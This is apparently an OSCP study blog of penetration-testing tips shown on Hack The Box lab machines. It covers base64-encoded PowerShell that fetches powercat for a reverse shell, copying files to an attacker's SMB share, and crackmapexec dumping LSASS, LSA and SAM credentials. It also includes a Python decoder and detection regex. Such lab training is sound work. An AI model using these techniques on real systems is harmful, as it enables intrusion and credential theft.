![[Drawing-2.sketchpad.png]]
May 20, 2023
## PowerShell Encoding from the Command Line
To properly encode PowerShell against a Windows target, it must be first converted to UTF-16LE and then base64 encoded. The PWK course shows this conversion using an online tool, but it's simpler to do it all from the command line using the following one-liner.
```
echo "iex(cmd)" | iconv -t UTF-16LE | base64 -w 0 | xclip -sel clip
```
The following example is demonstrated on Hack The Box's [Love](https://app.hackthebox.com/machines/344). First, `powercat.ps1` is copied to the working directory and hosted on a Python web server. Second, a netcat listener is set up on port 4444 to catch the incoming reverse shell.
Next, the PowerShell command to download and execute `powercat.ps1` is UTF-16LE encoded, base64 encoded, and copied to the clipboard. Using curl, the encoded PowerShell command is submitted with the spaces manually URL-encoded as `%20`. The reverse shell connection shown below confirms that the command executed.
![[Peek 2023-05-19 22-28.gif]]
<p align=center>Using an encoded PowerShell command to gain a reverse shell</p>
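As an added example (not from the original post or from the course material), the same UTF-16LE plus base64 conversion in Python, alongside the reverse step a defender applies when an encoded-command blob shows up in process-creation logging. The sample command line is constructed, and the regex for the parameter spelling is an assumption covering the common abbreviations only.

```python
import base64
import re
from typing import Optional


def encode_powershell(command: str, trailing_newline: bool = True) -> str:
    """Same transformation as the shell pipeline: UTF-16LE, then one-line base64.

    `echo` appends a newline before iconv sees the text, so the default
    reproduces the pipeline's output byte for byte; PowerShell ignores the
    trailing newline. Pass trailing_newline=False to mimic `printf '%s'`.
    """
    text = command + "\n" if trailing_newline else command
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Reverse step: base64 -> UTF-16LE bytes -> text. Strict decoding, so a
    blob that is not valid base64 / UTF-16LE raises instead of returning junk."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le").rstrip("\r\n")


# Spellings of the parameter commonly seen in process-creation logs (assumption:
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; only the
# usual abbreviations are matched here).
ENC_PARAM = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_from_command_line(cmdline: str) -> Optional[str]:
    """Pull the encoded blob out of a logged command line and decode it.
    Returns None when there is no such parameter or the blob does not decode."""
    match = ENC_PARAM.search(cmdline)
    if not match:
        return None
    try:
        return decode_powershell(match.group(1))
    except (ValueError, UnicodeDecodeError):  # bad base64 (binascii.Error) or odd byte count
        return None


# Constructed sample command line (not taken from any real log); the blob is
# encode_powershell("whoami"), i.e. what the one-liner above produces for `whoami`.
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkACgA="

if __name__ == "__main__":
    print(encode_powershell("iex(cmd)"))
    print(decode_from_command_line(SAMPLE_CMDLINE))  # whoami
```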
## SMB File Transfer from Windows -> Linux
Often you'll find yourself needing to transfer a file from a Windows target to your attacking Kali Linux system, such as when pulling down SharpHound output. The easiest way to do this is with [Impacket's SMB Server](https://github.com/fortra/impacket).
First, host a share on the attacking Kali Linux system by running `impacket-smbserver` with sudo privileges. The `-smb2support` flag is needed because SMB1 is disabled by default on modern versions of Windows. The `share` argument is the name of the share, and the trailing period is the directory where received files are saved, in this case the present working directory.
```
sudo impacket-smbserver -smb2support share .
```
Now, on the target, run `copy` followed by the file to copy over, then the UNC path made up of the attacking Kali Linux system's IP address (usually the tun0 address in an exam environment) and the share name, in this case `share`.
```
copy <file> \\<lhost>\share
```
Upon execution of the `copy` command, the SMB server should receive a connection. After a few moments, stop the SMB server with `CTRL + C`; the file should have transferred. Its integrity can be verified by comparing a hash of the file on both systems.
![[Peek 2023-05-18 18-07.gif]]
<p align=center>SMB file transfer from Windows to Linux of the file secret.txt</p>
## The Power of WPScan's API
WordPress is among the most popular web content management systems out there. Whenever you come across a target running WordPress, the [WordPress Security Scanner](https://github.com/wpscanteam/wpscan) should be run to enumerate the system. The PEN-200 course covers this tool, but the material doesn't show how useful the API is.
```
wpscan --url <rhosts> --api-token <token>
```
The WPScan API will be demonstrated on Hack The Box's [Tenten](https://app.hackthebox.com/machines/8), a Linux machine running a vulnerable `job-manager` plugin on WordPress.
First, without the API, WPScan identifies the `job-manager` plugin, but no further details about the plugin are displayed. After we add the API token, we get much more output, including two vulnerabilities for `job-manager` being identified: an IDOR and an XSS. I recommend registering for a free account [here](https://wpscan.com/register) and using the API. It will save you time!
![[Peek 2023-05-19 22-02.gif]]
<p align=center>On the left, no WPScan API token. On the right, with WPScan API token.</p>
## A Better Shell: rlwrap
GNU Readline is a software library that provides in-line editing of the command line including allowing users to move the text cursor over words, search command history, and use tab completion.
The Readline Wrapper, "rlwrap", allows all those Readline features to work through any program including netcat or impacket-psexec. The result is a shell that is much easier to work with.
On Hack The Box's [Active](https://app.hackthebox.com/machines/148), the difference between using and not using rlwrap is shown. The shell on the right can scroll up to previous commands and move the cursor over characters. Compare that to the shell on the left where the up and left arrow keys are interpreted incorrectly. Use rlwrap, it'll make your life easier!
![[Peek 2023-05-18 17-34.gif]]
<p align=center>Without rlwrap on the left. With rlwrap on the right.</p>
## Prevent Premature Interpretation in Bash
This section was inspired by the Information Goldmine PowerShell section of the PWK. Using winrm as `daveadmin` with the password `qwertyqwertyqwerty123!!`, the course material shows an example that adds escape characters (`\`) before the `!`s in the password. The password was enclosed in double quotes; it would have been more correct and simpler to enclose it in single quotes.
The difference between a single quote and a double quote might seem trivial, but it is important to understand how Bash, the tool you'll use most during the OSCP course, handles each.
In Bash, a string enclosed in single quotes preserves the literal value of every character: no expansion or substitution is performed on its contents.
Premature interpretation is depicted in the top-right section of the gif below. To Bash, `!!` means "replace me with the previous command", which in this case was `exit`.
Double quotes, on the other hand, will __NOT__ preserve the literal values of a string. As shown in the bottom left of the gif, each `!` has to be escaped with a backslash (`\`).
Single quotes should **ALWAYS** be used when passing a password that contains special characters; otherwise authentication can fail because the shell interprets the character before it is sent.
![[Peek 2023-05-18 19-58.gif]]
<p align=center>Top-left failed. Bottom-left worked but isn't ideal. The right, using single quotes, is best.</p>
## The Pentester's Swiss Army Knife: crackmapexec tips
[crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec) is a powerful tool to manage credentials across FTP, RDP, WINRM, MSSQL, LDAP, SMB, and SSH.
```
crackmapexec <protocol> <rhost> -u <username> -p <password> <post-exploitation>
```
The tool comes with powerful post-exploitation features, depicted below on Hack The Box's [Sauna](https://app.hackthebox.com/machines/229), that I'd like to highlight.
Armed with credentials with sufficient privileges, one can run the following post-exploitation commands without logging in to the system directly or manually downloading any additional tools.
* Dumping LSASS using the `-M lsassy` option.
* Dumping LSA using the `--lsa` option.
* Dumping SAM using the `--sam` option.
Bonus Tip
* Using `-x [command]`, any command can be run from crackmapexec across multiple systems. It was useful for gathering flags missed during the PWK labs.
Shout out to [RedTeamMedic](https://twitter.com/RedTeamMedic1) for teaching me this one!
![[Peek 2023-05-20 17-17.gif]]
<p align=center>crackmapexec's post-exploitation abilities being displayed</p>
## Bonus Apple Silicon Tip
Can you complete the OSCP on an ARM platform such as the M2 MacBooks? I'm happy to report that the answer is yes.
You can download the Apple silicon version of Kali Linux using the link below.
![[Pasted image 20230518233208.png]]
<center>https://www.kali.org/get-kali/#kali-installer-images</center>
The first thing you should do after downloading Kali Linux for ARM is run the following commands, which enable running amd64 (x86-64) applications through QEMU user-mode emulation.
```
sudo apt update
sudo apt install -y qemu-user-static binfmt-support
sudo dpkg --add-architecture amd64
sudo apt update
sudo apt install libc6:amd64
```
<p align=center>Source: https://www.kali.org/docs/arm/x86-on-arm/</p>
Now if only Apple would add support for nested virtualization.